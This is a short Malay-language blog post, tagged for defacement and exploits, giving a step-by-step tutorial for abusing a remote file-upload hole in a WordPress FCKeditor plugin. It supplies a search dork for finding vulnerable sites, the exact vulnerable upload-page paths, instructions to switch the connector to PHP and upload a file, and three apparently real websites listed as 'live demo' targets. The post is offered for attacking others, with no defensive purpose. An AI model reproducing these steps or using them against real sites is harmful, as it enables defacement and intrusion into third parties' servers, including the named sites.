WordPress deans with pwwangs code plugin for wordpress (FCKeditor) Remote File Upload

 By: Afif    02:12  Deface, Exploits   No comments

Assalamualaikum dan salam sejahtera.Hari ini aku nak share dengan korang tutorial baru.WP FCKEditor exploit!
Ok jom~

1. Mula search dork :
inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"


2. Pilih salah satu website dan tambahkan exploit dibawah di hujung url.
Exploit :

/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/uploadtest.html

atau

/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html


3. Seterusnya tukar connectors asp ke php dan choose file anda.Kemudian UPLOAD!

4. Untuk tengok hasil :

http://[target].com/UserFiles/filekorang.txt


DONE!

Live demo :
http://cougardating.datingease.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/upload/test.html
http://www.cereuswomen.com/podcast/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/uploadtest.html
https://scandlearn.com/iphonebeta/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/test.html


Sampai sini saja Assalamualaikum~

Item Reviewed: WordPress deans with pwwangs code plugin for wordpress (FCKeditor) Remote File Upload Description: Rating: 5 Reviewed By Afif